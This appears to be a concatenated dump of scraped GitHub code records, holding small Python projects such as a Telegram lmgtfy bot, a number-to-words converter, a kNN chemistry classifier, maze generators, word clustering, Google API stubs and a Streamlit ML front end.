\n if opc == 2:\n nombre_arch = \" \".join(input('Ingresar 
nombre del archivo a eliminar: ').split())\n if existe_archivo(archivos, nombre_arch):\n archivos[nombre_arch].print()\n eliminado, fat, sec_liberados = archivos[nombre_arch].eliminar_del_fat(fat)\n if eliminado:\n sectores = sectores + sec_liberados\n del archivos[nombre_arch]\n print('Archivo eliminado exitosamente')\n\n else:\n print('El archivo no existe')\n\n if opc == 3:\n mostrar_fat(archivos, mem_total)\n\n if opc == 4:\n fat, archivos = desfragmentar(fat, archivos)\n\n mem_total = sectores * sector\n #print('Memoria disponible: ', mem_total, ' KB')\n #print('Sectores disponibles: ', sectores)\n opc = mostrar_menu()\n \nmain()\n\n","repo_name":"AlejandroRV02/python-indexed-allocation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70018809762","text":"import telegram\n\n\nLAST_UPDATE_ID = None\n\n\ndef main():\n\n ''' This is the main function that has to be called '''\n\n global LAST_UPDATE_ID\n\n # Telegram Bot Authorization Token\n bot = telegram.Bot('Put your token here')\n\n # This will be our global variable to keep the latest update_id when requesting\n # for updates. It starts with the latest update_id if available.\n try:\n LAST_UPDATE_ID = bot.getUpdates()[-1].update_id\n except IndexError:\n LAST_UPDATE_ID = None\n\n while True:\n fetch_url(bot)\n\n\ndef list_compare(first_list, second_list):\n\n ''' Function to compare two list and return the index of first matched index'''\n\n for word in first_list:\n if word in second_list:\n return second_list.index(word)\n return -1\n\ndef fetch_url(bot):\n global LAST_UPDATE_ID\n\n # Following is a dictionary of commands that the bot can use\n\n commands = {'/help':\"You can add me in any group or text me! I don't have aceess to the group message so you need to call me by my name i.e @lmgtfyou_bot or start your senstence with '/' , I listen to the keyword 'means' \", '/start':'I am always listening to you. 
Just use magical words'}\n\n magic_words = ['means','mean','/means','/mean']\n\n for update in bot.getUpdates(offset=LAST_UPDATE_ID, timeout=10):\n chat_id = update.message.chat_id\n message = update.message.text.encode('utf-8')\n message_list = message.split()\n\n if(message in commands):\n bot.sendMessage(chat_id=chat_id, text=commands[message])\n LAST_UPDATE_ID = update.update_id + 1\n\n if ( list_compare(magic_words, message_list)!= -1):\n search = message_list[list_compare(magic_words, message_list)-1]\n url='http://lmgtfy.com/?q='+search\n bot.sendMessage(chat_id=chat_id,text=url)\n LAST_UPDATE_ID = update.update_id + 1\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"farhaanbukhsh/Telegram-Bots","sub_path":"lmgtfy_bot.py","file_name":"lmgtfy_bot.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"32203040498","text":"class NumbersToWords(object):\n\tdef __init__(self, context=''):\n\t\tself.ONES_TENS = \"one two three four five six seven eight nine ten eleven twelve thirteen fourteen fifteen sixteen seventeen eighteen nineteen twenty\".split(\" \")\n\t\tself.MULTIPLES_OF_TEN = \"ten twenty thirty fourty fifty sixty seventy eighty ninty hundred\".split(\" \")\n\t\tself.WORDS = \"hundred thousand million billion trillion gazillion\".split(\" \")\n\t\tself.context = context\n\n\tdef convert_segment(self, number):\n\t\toutput = \"\"\n\t\tnumber = int(number)\n\t\tif number <= 0:\n\t\t\toutput = \"\"\n\t\telse:\n\t\t\tif number <= 20:\n\t\t\t\toutput = self.ONES_TENS[number-1].capitalize()\n\t\t\telif number <= 99:\n\t\t\t\toutput = self.MULTIPLES_OF_TEN[number/10-1].capitalize()\n\t\t\t\tif number%10 != 0:\n\t\t\t\t\toutput += \" \" + self.ONES_TENS[number%10-1].capitalize()\n\t\t\telif number <= 999:\n\t\t\t\toutput = self.ONES_TENS[number/100-1].capitalize()\n\t\t\t\toutput += \" \" + self.WORDS[0].capitalize()\n\t\t\t\tif number%100 != 0:\n\t\t\t\t\toutput += \" and \" + self.convert_segment(number%100)\n\t\treturn output\n\n\tdef convert(self, number):\n\t\tsegment_output = []\n\t\tnumber_segments = self.make_segments(number)\n\t\tnumber_segments = number_segments[::-1]\n\t\tfor i, segment in enumerate(number_segments):\n\t\t\tif int(segment) > 0:\n\t\t\t\tif i != 0:\n\t\t\t\t\tsegment_output.append(self.convert_segment(segment) + \" \" + self.WORDS[i].capitalize())\n\t\t\t\telse:\n\t\t\t\t\tsegment_output.append(self.convert_segment(segment))\n\t\treturn ', '.join(segment_output[::-1]) + (\" \" + self.context.capitalize() if self.context else \"\")\n\n\tdef make_segments(self, number):\n\t\t# reverse the order of numbers\n\t\tnumber = str(number)[::-1]\n\t\toutput = []\n\t\t# split numbers into segments of 3s\n\t\tfor num in range(0, len(number), 3):\n\t\t\toutput.append(number[num:num+3])\n\t\t# reverse each segment back to normal\n\t\tfor i,v in enumerate(output):\n\t\t\toutput[i] = output[i][::-1]\n\t\t# reverse the order of segments\n\t\treturn output[::-1]","repo_name":"muhanad40/Numbers-To-Words-Python","sub_path":"lib/NumbersToWords.py","file_name":"NumbersToWords.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71183598883","text":"import cv2\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n ret, frame = cap.read()\r\n cv2.imshow('frame', frame)\r\n frame_width = int(cap.get(3))\r\n frame_height = int(cap.get(4))\r\n\r\n size = (frame_width, 
frame_height)\r\n cv2.VideoWriter('output.avi', cv2.VideoWriter_fourcc(*'MJPG'), 10, size)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"tanishkamunot03/Practicals_OSL","sub_path":"practical_4_A.py","file_name":"practical_4_A.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72175394083","text":"from __future__ import division\nimport os\nos.chdir(r'D:\\Haverford\\2017-2018\\Chem 362')\n\nimport pickle, time\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n# Checks if the dimensions of involved arrays are in order\n# Makes it easier to spot mistakes\ndef dims(arg):\n print(np.shape(arg))\n \nkset = [1, 2, 3, 5]\nwith open('cleandata.p', 'rb') as f:\n rawdata0, reality0, Zscore_exempted_cols, coldict, rowdict = pickle.load(f)\n\n# PARAMETERS\nbmin = 500\nbmax = 3000\nbgap = 25\nbset = range(0, bmax - bmin + bgap, bgap)\ntest_size = 0.1\n\ntraintestratio = []\ntimeused = [[] for _ in kset]\n\n# DON'T USE acc, acc3, acc4, acc34 = [[[] for _ in kset]] * 4\n# This is defining a single variable in many names\nacc, acc1, acc2, acc12, acc3, acc4, acc34 = ([[] for _ in kset] for _ in range(7))\n\n# Control set using randomness\naccr, accr1, accr2, accr12, accr3, accr4, accr34 = ([] for _ in range(7))\n\nreality0 = [int(i) for i in reality0]\n\nrawdata = np.array(rawdata0)\nreality = np.array([[n] for n in reality0])\nlabel_dist = [reality0.count(i)/len(reality0) for i in range(1, 5)]\n\nX_train, X_test, Y_train, Y_test = train_test_split(rawdata, reality,\n test_size=test_size,\n random_state=42)\n\nY0_test = np.concatenate(Y_test[:]) # 1D version of Y_test, used for zipping\n\n# FOR SUBSET ACCURACY QUANTIFICATION USE\nfor b in bset:\n \n Xb_train = X_train[:bmin+b, :]\n Yb_train = Y_train[:bmin+b, :]\n\n print(\"The size of the training set is\", bmin + b)\n \n traintotest = (bmin + b)/len(Y_test)\n traintestratio.append(traintotest)\n print(\"The ratio of training set to testing set is\", traintotest)\n \n for k, n_neighbors in enumerate(kset):\n kstart = time.clock()\n \n knn = KNeighborsClassifier(n_neighbors) \n knn.fit(Xb_train, Yb_train)\n pred = knn.predict(X_test)\n \n # Prediction choices?\n _, predcounts = np.unique(pred, return_counts=True)\n if len(predcounts) != 4:\n mask = np.isin(list(range(1, 5)), pred)\n for i in np.where(mask == False):\n predcounts = np.insert(predcounts, i, 1)\n # change to 0 in future, involves amending below\n \n zipcheck = np.column_stack((Y0_test, pred))\n \n right_choices, right_choices_1, right_choices_2, right_choices_1_2, right_choices_3, right_choices_4, right_choices_3_4= [0] * 7\n \n for i, (a, b) in enumerate(zipcheck):\n if a == b:\n right_choices += 1\n if a == b == 1:\n right_choices_1 += 1\n if a == b == 2:\n right_choices_2 += 1\n if a == b == 3:\n right_choices_3 += 1\n if a == b == 4:\n right_choices_4 += 1\n if a in (1, 2) and b in (1, 2):\n right_choices_1_2 += 1\n if a in (3, 4) and b in (3, 4):\n right_choices_3_4 += 1\n \n accuracy = right_choices/len(pred)\n print(\"The predictions are\", accuracy * 100, \"percent correct\")\n \n accuracy_1 = right_choices_1/predcounts[0]\n accuracy_2 = right_choices_2/predcounts[1]\n accuracy_1_2 = right_choices_1_2/(predcounts[0] + predcounts[1])\n accuracy_3 = right_choices_3/predcounts[2]\n accuracy_4 = 
right_choices_4/predcounts[3]\n accuracy_3_4 = right_choices_3_4/(predcounts[2] + predcounts[3])\n \n acc[k].append(accuracy)\n acc1[k].append(accuracy_1)\n acc2[k].append(accuracy_2)\n acc12[k].append(accuracy_1_2)\n acc3[k].append(accuracy_3)\n acc4[k].append(accuracy_4)\n acc34[k].append(accuracy_3_4)\n \n kend = time.clock()\n timeused[k].append(kend - kstart)\n print(\"The operation took\", kend - kstart, \"to complete\")\n \n # Baselines \n # Weighted randomly generated results are presented as a control group\n pred_random = np.random.choice(np.array(range(1, 5)), int(len(Y_test)), p=label_dist)\n _, predcounts_random = np.unique(pred_random, return_counts=True)\n if len(predcounts_random) != 4:\n print('Divide by zero scenario ahead')\n raise ValueError('For a certain outcome, RNG generates zero appearances')\n \n zipcheck_random = np.column_stack((Y_test, pred_random))\n \n random_choices, random_choices_1, random_choices_2, random_choices_1_2, random_choices_3, random_choices_4, random_choices_3_4= [0] * 7\n \n for i, (a, b) in enumerate(zipcheck_random):\n if a == b:\n random_choices += 1\n if a == b == 1:\n random_choices_1 += 1\n if a == b == 2:\n random_choices_2 += 1\n if a == b == 3:\n random_choices_3 += 1\n if a == b == 4:\n random_choices_4 += 1\n if a in (1, 2) and b in (1, 2):\n random_choices_1_2 += 1\n if a in (3, 4) and b in (3, 4):\n random_choices_3_4 += 1\n \n accuracy_r = random_choices/len(pred_random)\n print(\"The predictions are\", accuracy * 100, \"percent correct\")\n \n accuracy_r1 = random_choices_1/predcounts_random[0]\n accuracy_r2 = random_choices_2/predcounts_random[1]\n accuracy_r1_r2 = random_choices_1_2/(predcounts_random[0] + predcounts_random[1])\n accuracy_r3 = random_choices_3/predcounts_random[2]\n accuracy_r4 = random_choices_4/predcounts_random[3]\n accuracy_r3_r4 = random_choices_3_4/(predcounts_random[2] + predcounts_random[3])\n \n accr.append(accuracy_r)\n accr1.append(accuracy_r1)\n accr2.append(accuracy_r2)\n accr12.append(accuracy_r1_r2)\n accr3.append(accuracy_r3)\n accr4.append(accuracy_r4)\n accr34.append(accuracy_r3_r4)\n \n # Code used for single random benchmark\n \"\"\"\n pred_random = np.reshape(pred_random, (-1, 1))\n accuracy_random = accuracy_score(Y_test, pred_random)\n acc_random.append(accuracy_random)\n \"\"\"\n \n b += bgap\n\naccpack = acc, acc1, acc2, acc12, acc3, acc4, acc34\naccrpack = accr, accr1, accr2, accr12, accr3, accr4, accr34\nplotuse = accpack, accrpack, timeused, bset, kset\n\nwith open('plotdata.p', 'wb') as g:\n g.seek(0)\n g.truncate() # Erase everything before moving forward\n pickle.dump(plotuse,g)","repo_name":"z-q-y/darkrxns","sub_path":"k-Nearest_Neighbors_v1.py","file_name":"k-Nearest_Neighbors_v1.py","file_ext":"py","file_size_in_byte":6485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39900895131","text":"import sys\nfrom operator import itemgetter\nfrom math import log\nimport argparse\nfrom collections import Counter\nfrom morph import Morphology\n\nfrom language import Language\nfrom perplexity import calcPerplexity\n\ndef nlogn(x):\n if x == 0:\n return x\n else:\n return x * log(x)\n\ndef readInputFile(inputFileName):\n \n wordDict = {}\n bigramDict = {}\n \n sys.stderr.write('\\nReading input file...')\n \n for en in open(inputFileName,'r'):\n \n en = en.strip()\n enWords = en.split()\n \n prevWord = ''\n for word in enWords:\n \n if word in wordDict:\n wordDict[word] += 1.0\n else:\n wordDict[word] = 1.0\n\n if prevWord != 
'':\n if (prevWord, word) in bigramDict:\n bigramDict[(prevWord, word)] += 1.0\n else:\n bigramDict[(prevWord, word)] = 1.0\n prevWord = word\n \n sys.stderr.write(' Complete!\\n')\n return wordDict, bigramDict\n \ndef runOchClustering(lang):\n \n wordsExchanged = 9999\n iterNum = 0\n wordVocabLen = len(lang.wordDict)\n \n #origPerplex, wastePerplex = calcPerplexity(lang, None, None, None, 0)\n origPerplex = 0.0\n \n while ((wordsExchanged > 0.001 * wordVocabLen or iterNum < 10) and wordsExchanged != 0 and iterNum <= 20):\n iterNum += 1\n wordsExchanged = 0\n wordsDone = 0\n \n sys.stderr.write('\\n'+'IterNum: '+str(iterNum)+'\\n'+'Perplexity: '+str(origPerplex)+'\\n')\n \n for (word, val) in sorted(lang.wordDict.items(), key=itemgetter(1), reverse=True):\n # Looping over all the words in the vocabulory\n #for word in sorted(lang.wordDict.keys()):\n origClass = lang.wordToClusDict[word]\n currLeastPerplex = origPerplex\n tempNewClass = origClass\n \n # Try shifting every word to a new cluster and caluculate perplexity\n for possibleNewClass in lang.clusUniCount.keys():\n if possibleNewClass != origClass:\n \n deltaMono = lang.calcTentativePerplex(word, origClass, possibleNewClass)\n possiblePerplex = deltaMono + origPerplex\n \n if possiblePerplex < currLeastPerplex:\n currLeastPerplex = possiblePerplex\n tempNewClass = possibleNewClass\n \n wordsDone += 1\n if wordsDone % 1000 == 0: \n sys.stderr.write(str(wordsDone)+' ')\n \n if tempNewClass != origClass:\n \n wordsExchanged += 1\n lang.updateDistribution(word, origClass, tempNewClass)\n \n origPerplex = currLeastPerplex\n \n sys.stderr.write('\\nwordsExchanged: '+str(wordsExchanged)+'\\n')\n \n return \n \ndef printNewClusters(outputFileName, lang):\n \n outFile = open(outputFileName, 'w')\n \n for clus, wordList in lang.wordsInClusDict.iteritems():\n \n wDict = {}\n for word in wordList:\n wDict[word] = lang.wordDict[word]\n \n for word, val in sorted(wDict.items(), key=itemgetter(1), reverse=True):\n outFile.write(word+'\\t'+str(clus)+'\\n')\n \ndef main(inputFileName, outputFileName, numClusInit, typeClusInit, morphWeight):\n \n # Read the input file and get word counts\n wordDict, bigramDict = readInputFile(inputFileName)\n \n lang = Language(wordDict, bigramDict, numClusInit, typeClusInit)\n #morph = Morphology(lang, morphWeight)\n #lang.setMorphologyObject(morph)\n \n runOchClustering(lang)\n \n # Print the clusters\n printNewClusters(outputFileName, lang)\n \nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--inputfile\", type=str, help=\"Input file containing word bigram and unigram counts\")\n parser.add_argument(\"-n\", \"--numclus\", type=int, help=\"No. 
of clusters to be formed\")\n parser.add_argument(\"-o\", \"--outputfile\", type=str, help=\"Output file with word clusters\")\n parser.add_argument(\"-t\", \"--type\", type=int, choices=[0, 1], default=1, help=\"type of cluster initialization\")\n parser.add_argument(\"-m\", \"--morphweight\", type=float, default=0, help=\"weight given to morphology factor\")\n \n args = parser.parse_args()\n \n inputFileName = args.inputfile\n numClusInit = args.numclus\n outputFileName = args.outputfile\n typeClusInit = args.type\n morphWeight = args.morphweight\n \n main(inputFileName, outputFileName, numClusInit, typeClusInit, morphWeight)","repo_name":"mfaruqui/word-clustering","sub_path":"monoMain.py","file_name":"monoMain.py","file_ext":"py","file_size_in_byte":4730,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20014147398","text":"import logging\nimport os\nimport numpy as np\nfrom pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint\n\n\ndef count_trainable_parameters(model):\n model_parameters = filter(lambda p: p.requires_grad, model.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n return params\n\n\nlogger = logging.getLogger(__name__)\n\ndef get_checkpoint_callback(output_dir, metric, save_top_k=1, lower_is_better=False):\n if metric == \"loss\":\n exp = \"{val_avg_loss:.4f}-{epoch_count}\"\n\n else:\n raise NotImplementedError(\n f\"seq2seq callbacks only support loss, got {metric}, You can make your own by adding to this function.\"\n )\n\n checkpoint_callback = ModelCheckpoint(\n filepath=os.path.join(output_dir, exp),\n monitor=f\"val_{metric}\",\n mode=\"min\" if \"loss\" in metric else \"max\",\n save_top_k=save_top_k,\n period=0, # maybe save a checkpoint every time val is run, not just end of epoch.\n )\n return checkpoint_callback\n\n\ndef get_early_stopping_callback(metric, patience):\n return EarlyStopping(\n monitor=f\"val_{metric}\", # does this need avg?\n mode=\"min\" if \"loss\" in metric else \"max\",\n patience=patience,\n verbose=True,\n )\n","repo_name":"rattlesnakey/Definition-Gneration-Contrastive","sub_path":"src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"7001646376","text":"import collections.abc\nimport typing\n\nimport httplib2 # type: ignore\nimport typing_extensions\n\nimport googleapiclient.discovery\nimport googleapiclient.http # type: ignore\n\nfrom .schemas import *\n\n_list = list\n\n@typing.type_check_only\nclass StreetViewPublishResource(googleapiclient.discovery.Resource):\n @typing.type_check_only\n class PhotoResource(googleapiclient.discovery.Resource):\n def create(\n self, *, body: Photo = ..., **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n def delete(self, *, photoId: str, **kwargs: typing.Any) -> EmptyHttpRequest: ...\n def get(\n self,\n *,\n photoId: str,\n languageCode: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n def startUpload(\n self, *, body: Empty = ..., **kwargs: typing.Any\n ) -> UploadRefHttpRequest: ...\n def update(\n self,\n *,\n id: str,\n body: Photo = ...,\n updateMask: str = ...,\n **kwargs: typing.Any\n ) -> PhotoHttpRequest: ...\n\n @typing.type_check_only\n class PhotoSequenceResource(googleapiclient.discovery.Resource):\n def create(\n self,\n *,\n body: PhotoSequence = 
...,\n inputType: typing_extensions.Literal[\n \"INPUT_TYPE_UNSPECIFIED\", \"VIDEO\", \"XDM\"\n ] = ...,\n **kwargs: typing.Any\n ) -> OperationHttpRequest: ...\n def delete(\n self, *, sequenceId: str, **kwargs: typing.Any\n ) -> EmptyHttpRequest: ...\n def get(\n self,\n *,\n sequenceId: str,\n filter: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> OperationHttpRequest: ...\n def startUpload(\n self, *, body: Empty = ..., **kwargs: typing.Any\n ) -> UploadRefHttpRequest: ...\n\n @typing.type_check_only\n class PhotoSequencesResource(googleapiclient.discovery.Resource):\n def list(\n self,\n *,\n filter: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n **kwargs: typing.Any\n ) -> ListPhotoSequencesResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListPhotoSequencesResponseHttpRequest,\n previous_response: ListPhotoSequencesResponse,\n ) -> ListPhotoSequencesResponseHttpRequest | None: ...\n\n @typing.type_check_only\n class PhotosResource(googleapiclient.discovery.Resource):\n def batchDelete(\n self, *, body: BatchDeletePhotosRequest = ..., **kwargs: typing.Any\n ) -> BatchDeletePhotosResponseHttpRequest: ...\n def batchGet(\n self,\n *,\n languageCode: str = ...,\n photoIds: str | _list[str] = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> BatchGetPhotosResponseHttpRequest: ...\n def batchUpdate(\n self, *, body: BatchUpdatePhotosRequest = ..., **kwargs: typing.Any\n ) -> BatchUpdatePhotosResponseHttpRequest: ...\n def list(\n self,\n *,\n filter: str = ...,\n languageCode: str = ...,\n pageSize: int = ...,\n pageToken: str = ...,\n view: typing_extensions.Literal[\"BASIC\", \"INCLUDE_DOWNLOAD_URL\"] = ...,\n **kwargs: typing.Any\n ) -> ListPhotosResponseHttpRequest: ...\n def list_next(\n self,\n previous_request: ListPhotosResponseHttpRequest,\n previous_response: ListPhotosResponse,\n ) -> ListPhotosResponseHttpRequest | None: ...\n\n def new_batch_http_request(\n self,\n callback: collections.abc.Callable[\n [\n str,\n googleapiclient.http.HttpRequest,\n googleapiclient.errors.HttpError | None,\n ],\n typing.Any,\n ]\n | None = ...,\n ) -> googleapiclient.http.BatchHttpRequest: ...\n def photo(self) -> PhotoResource: ...\n def photoSequence(self) -> PhotoSequenceResource: ...\n def photoSequences(self) -> PhotoSequencesResource: ...\n def photos(self) -> PhotosResource: ...\n\n@typing.type_check_only\nclass BatchDeletePhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchDeletePhotosResponse: ...\n\n@typing.type_check_only\nclass BatchGetPhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchGetPhotosResponse: ...\n\n@typing.type_check_only\nclass BatchUpdatePhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> BatchUpdatePhotosResponse: ...\n\n@typing.type_check_only\nclass EmptyHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Empty: ...\n\n@typing.type_check_only\nclass 
ListPhotoSequencesResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListPhotoSequencesResponse: ...\n\n@typing.type_check_only\nclass ListPhotosResponseHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> ListPhotosResponse: ...\n\n@typing.type_check_only\nclass OperationHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Operation: ...\n\n@typing.type_check_only\nclass PhotoHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> Photo: ...\n\n@typing.type_check_only\nclass UploadRefHttpRequest(googleapiclient.http.HttpRequest):\n def execute(\n self,\n http: httplib2.Http | googleapiclient.http.HttpMock | None = ...,\n num_retries: int = ...,\n ) -> UploadRef: ...\n","repo_name":"henribru/google-api-python-client-stubs","sub_path":"googleapiclient-stubs/_apis/streetviewpublish/v1/resources.pyi","file_name":"resources.pyi","file_ext":"pyi","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"43248965977","text":"import random\r\n\r\n\r\n\r\ndef binary_tree(Grid):\r\n \"\"\" \r\n Fast, efficient, and simple\r\n Strongly biased toward diagonals (here NE)\r\n \"\"\"\r\n for cell in Grid.cells:\r\n neighbors = []\r\n if cell.north_cell is not None:\r\n neighbors.append(cell.north_cell)\r\n if cell.east_cell is not None:\r\n neighbors.append(cell.east_cell)\r\n if neighbors:\r\n neighbor = random.choice(neighbors)\r\n if neighbor:\r\n cell.dig(neighbor)\r\n\r\n\r\ndef aldous_broder(Grid):\r\n \"\"\"\r\n Perfect randomly maze\r\n Long to finish in big mazes ++\r\n \"\"\"\r\n actual_cell = random.choice(Grid.cells)\r\n not_yet_visited = len(Grid.cells)-1\r\n\r\n while not_yet_visited > 0:\r\n neighbors = actual_cell.neighbors\r\n neighbor = random.choice(neighbors)\r\n if not neighbor.links: #If list is not empty (empty = False)\r\n actual_cell.dig(neighbor)\r\n not_yet_visited -= 1\r\n actual_cell = neighbor\r\n\r\ndef hunt_and_kill(Grid):\r\n \"\"\"\r\n Few dead-ends, long rivers\r\n Low memory, but slow\r\n \"\"\"\r\n actual_cell = random.choice(Grid.cells)\r\n\r\n while actual_cell is not None:\r\n not_visited_neighbors = [neighbor for neighbor in actual_cell.neighbors if len(neighbor.links) == 0]\r\n if not_visited_neighbors:\r\n neighbor = random.choice(not_visited_neighbors)\r\n actual_cell.dig(neighbor)\r\n actual_cell = neighbor\r\n else:\r\n actual_cell = None\r\n for i in Grid.cells:\r\n visited_neighbors = [neighbor for neighbor in i.neighbors if len(neighbor.links) > 0]\r\n if not i.links and visited_neighbors:\r\n actual_cell = i\r\n neighbor = random.choice(visited_neighbors)\r\n actual_cell.dig(neighbor)\r\n break \r\n\r\n\r\n\r\n# Dict containing the list of algorithms \r\ncreation_algorithms = {\r\n \"bt\":binary_tree, \r\n \"ab\":aldous_broder, \r\n \"hk\":hunt_and_kill,\r\n }\r\n \r\n","repo_name":"Aytan-sudo/mazes_for_python","sub_path":"algo_maze.py","file_name":"algo_maze.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
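The next record's distance helpers rely on the ||x||^2 + ||y||^2 - 2*x.y expansion for pairwise Euclidean distances; a small self-contained check of that identity (array sizes and names below are illustrative only, not part of the dataset):

import numpy as np

X = np.random.rand(5, 3)  # 5 query points in R^3 (sizes are arbitrary)
Y = np.random.rand(4, 3)  # 4 reference points in R^3

# Vectorized pairwise squared distances via ||x||^2 + ||y||^2 - 2*x.y
sq = (X * X).sum(axis=1)[:, None] + (Y * Y).sum(axis=1)[None, :] - 2 * X.dot(Y.T)
fast = np.sqrt(np.maximum(sq, 0.0))  # clamp tiny negatives caused by rounding

# Naive double loop as the reference
ref = np.array([[np.linalg.norm(x - y) for y in Y] for x in X])
assert np.allclose(fast, ref)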
+{"seq_id":"24552110148","text":"import numpy as np\n\ndef euclidean_distance(X, Y):\n m = X.shape[0]\n n = Y.shape[0]\n X_dots = (X * X).sum(axis=1).reshape((m, 1)) * np.ones(shape=(1, n))\n Y_dots = (Y * Y).sum(axis=1) * np.ones(shape=(m, 1))\n return np.sqrt(X_dots + Y_dots - 2 * X.dot(Y.T))\n\n\ndef cosine_distance(X, Y):\n dotted = X.dot(Y.T)\n matrix_norms = np.linalg.norm(X, axis=1)\n vector_norm = np.linalg.norm(Y, axis=1)\n matrix_vector_norms = np.outer(matrix_norms, vector_norm)\n neighbors = 1.0 - np.divide(dotted, matrix_vector_norms)\n return neighbors\n","repo_name":"punditjava/machine_learning","sub_path":"KNN_Classifier/distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14975726417","text":"import csv\n\nwith open('rent_converted.tsv',encoding = 'utf-8') as f:\n reader = csv.reader(f,delimiter='\\t')\n next(reader)\n for row in reader:\n prefecture = ['13']\n ward = ['204']\n station = ['242','4987','4986']\n roomtype = ['10','20','25','30']\n\n if (row[9] in prefecture)and (row[10] in ward) and(row[12] in station) and (row[34] in roomtype):\n print(row)\n with open('mitaka.csv', 'a', encoding='utf-8_sig') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(row)\n csvFile.close()\n","repo_name":"nnao01294/mitaka_test","sub_path":"mitaka_csv.py","file_name":"mitaka_csv.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2264394913","text":"\"\"\"\nRuns the streamlit front end for the mlexec demo.\n\"\"\"\nimport pandas as pd\nimport streamlit as st\nfrom mlexec import MLExecutor\n\nMODEL_OPTIONS = {\"lgb\",\"svm\",\"nn\",\"lr\",\"rf\",\"xgb\",\"knn\"}\nTASK_OPTIONS = {\"classification\",\"regression\"}\nMETRIC_OPTIONS = {\"classification\": [\"matthews_corrcoef\",\"misclassification_cost\",\n \"accuracy\", \"recall\", \"precision\",\"f1_score\",\"auc_roc\",\"auc_pr\"],\n \"regression\": [\"rmse\",\"r2\",\"mae\",\"mape\"]}\nCV_OPTIONS = [\"basic\",\"nested\",\"\"]\n\ndef run_mlexec(df_: pd.DataFrame,\n target_col:str,\n task:str=\"classification\",\n model_list:list=[\"lgb\",\"rf\",\"xgb\"],\n metric:str=\"\",\n excluded_cols:list=[],\n n_fold:int=4,\n cv_type:str=\"basic\",\n num_config:int=10):\n \"\"\"Running MLexecutor using the input paramters provided by the user.\n\n Args:\n df_ (pd.DataFrame): The dataframe containing the dependent and independent variables. \\n\n target_col (str): The column which contains the value for the dependent variable. \\n\n task (str, optional): The task: `\"regression\"` or `\"classification\"`.\\n\n model_list (list, optional): List of models to tune. 
